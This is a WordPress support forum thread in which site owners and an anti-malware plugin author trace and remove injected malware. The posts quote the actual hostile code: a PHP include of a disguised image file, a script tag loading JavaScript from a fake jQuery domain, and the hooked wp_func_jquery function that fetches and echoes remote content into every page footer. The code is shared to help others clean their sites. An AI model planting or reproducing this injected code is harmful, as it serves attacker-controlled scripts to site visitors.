Malware php:agent-uf [trj] still loading a script.

Resolved marcsohier
(@marcsohier)

11 years, 1 month ago
Hello Eli,

Thanks for your great plugin. I am facing some issues with malwares injected into my wordpress website.

Before to set up your plugin, I had manually removed infected files with the code <?php include(‘assets/images/social.png’); ?>.

Then your plugin found one more file infected that I missed manually. Your plugin now says that my website is clean.

However, I still think my website is infected as using the Chrome Console I always find this script into my source code :
```
<script type="text/javascript">
var now = new Date().getTime();
if (now%2 == 0) {
if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://www.wpstat.org/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://www.wpstat.org/jquery.js"></scr'+'ipt>'); }
}
</script>
```
I’m trying for hours to solve this issue but I do not succeed. I’ve backed up my website locally and did thousands of string researches and I did not find which file is calling this script just above the </footer>.

The file social.png add apparently some data in the Sql database but even here I did not find any relevant thing explaining how this code is loaded.

I would be really grateful if you have any idea or solution.

Thanks a lot for your great help to everyone.

Marc

https://wordpress.org/plugins/gotmls/

Viewing 12 replies - 1 through 12 (of 12 total)

Thread Starter marcsohier
(@marcsohier)

11 years, 1 month ago

Here is my website : http://www.angelinextension.com/.

I forgot to mention that I have also tried to block this query using the plugin BBQ Block Bad Queries but it still loads the script.

Thanks you Eli,

Marc

Plugin Author Eli
(@scheeeli)

11 years, 1 month ago

I see that script output in the HTML source code of your site, but without access to the back-end I won’t be able to determine where it is coming from. It may be helpful for you to search the contents of your plugin and theme files for this md5 hash 74be16979710d4c4e7c6647856088456 that is referenced by the comment just above the script output in question. If you find this in a PHP file then it is likely that the code that renders that malicious script is right below it.

Let me know if you find it so I can add it to my definition updates. You can contact me directly at: eli AT gotmls DOT net

Plugin Author Eli
(@scheeeli)

11 years, 1 month ago

Thanks for sending me your info.

It looks to me like all those wp_func_jquery functions are malicious. I have found at least 3 different variation of it in various plugin and in your theme but I don’t think it was originally part of any of those files. I know that code look pretty legitimate and this hacker has written it to integrate into WordPress better that a lot of the legitimate plugins out there, but if you look at the whole URL that is constructed it is not a legitimate domain to be downloading any jquery files from. And you would not really want to be remotely fetching your jquery files from a third-party host at some obscure domain anyway.

All these wp_func_jquery functions are similar enough to say that they were written by the same hacker but they have been injected into different include files in unrelated plugins and themes. So, I collecting these new variants and adding them to my definition updates now.

I expect that when they are all removed we will not see that script on in the output of your footer…

Thread Starter marcsohier
(@marcsohier)

11 years, 1 month ago

Eli, thanks a lot for your great help and amazing skills.

Marc

Metalp3n
(@metalp3n)

11 years, 1 month ago

How did you guys get that code removed? I seem to be having the very same issue in my footer as-well – and I have downloaded my entire directory and ran a search using FileSeek and can’t seem to find where that code made it in.

Metalp3n
(@metalp3n)

11 years, 1 month ago

The site btw is rapidpurple.com

Plugin Author Eli
(@scheeeli)

11 years, 1 month ago

Have you tried using my Anti-Malware plugin to scan your site?

In the case of Marc’s site it was a custom function called wp_func_jquery that was hooked into WordPress using add_action in various theme and plugin files. I have added this threat to my Definition Updates so that it can be automatically fixed (even if it is not called “wp_func_jquery”).

You’ll need to register my plugin and download the latest Definition updates but then it should be able to remove this threat for you.

Aloha, Eli

Metalp3n
(@metalp3n)

11 years, 1 month ago

Registering and giving it a go now. Fingers crossed Eli.

Metalp3n
(@metalp3n)

11 years, 1 month ago

You called it mate. The new definition updates squared this away also. Thanks Eli!

For anyone else – it seems the following was the ACTUAL code related to this:

if(!function_exists(‘wp_func_jquery’)) {
function wp_func_jquery() {
$host = ‘http://’;
$jquery = $host.’c’.’jquery.org/jquery-ui.js’;
$headers = @get_headers($jquery, 1);
if ($headers[0] == ‘HTTP/1.1 200 OK’){
echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}
}
add_action(‘wp_footer’, ‘wp_func_jquery’);
}

This looked so weird to me too and yet I overlooked it due to the jquery.org reference.

absoluteczech
(@absoluteczech)

11 years ago

@metalp3n
thank you so much! that was the exact same code i had in my theme. i couldn’t figure out where it was coming from!

Metalp3n
(@metalp3n)

11 years ago

@absoluteczech glad to help!

cosmln
(@cosmln)

10 years, 9 months ago

Hi,

Sorry that I’m entering on this uninvited but I have similar problems but with another version of the same(?) virus: PHP:Agent-IN[Trj] (https://wordpress.org/support/topic/been-hacked-3).

I have installed Anti-Malware from GOTMLS.NET found some problems but me almost a newbies and really don’t know what to do next.

Anyone can help?

Thank you,
Cosmin

Viewing 12 replies - 1 through 12 (of 12 total)

The topic ‘Malware php:agent-uf [trj] still loading a script.’ is closed to new replies.